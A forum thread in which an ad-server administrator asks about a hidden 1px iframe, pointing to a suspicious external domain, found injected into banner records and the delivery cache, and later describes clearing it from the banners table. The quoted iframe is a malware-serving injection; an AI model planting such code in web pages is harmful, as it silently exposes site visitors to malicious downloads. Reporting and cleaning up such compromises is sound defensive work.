Jump to content
Sign in to follow this  
pxl_rene

Strange Iframe Requests In Banners

Recommended Posts

heya folks,

 

as our ad infrastructure has been hacked multiple times, i was just playing around with my mysql proxy on my system for testing purposes.

 

So, while i was looking at the screen i noticed something i have seen before - strange queries.

 

"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>

 

I saw that domain some time ago and now im wondering what this is.

Im guessing that this is some code, which surely doesnt belong there.

So now my question is, how it got there and what its supposed to mean and how i can get rid of it?

 

kind regards,

 

rene

 

Share this post


Link to post
Share on other sites

hey, 

 

this happens in the deliverycache for example. But i cant find the code in the Admin Interface.

So which part of the Adserver is responsible for the generation of the deliverycache php files?

Share this post


Link to post
Share on other sites

After some research it showed that once back in time, ikromet.c0m.li was linked to an ukranian IP (no offense intended) and seems like this was used for serving malware stuff. 1px iframe, which nobody notices.

 

So i went to the table oa_banners and searched for banners with ikromet in its fields.

I replaced every field with an empty string.

 

But im still interested in how this got into the databases..

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  



×
×
  • Create New...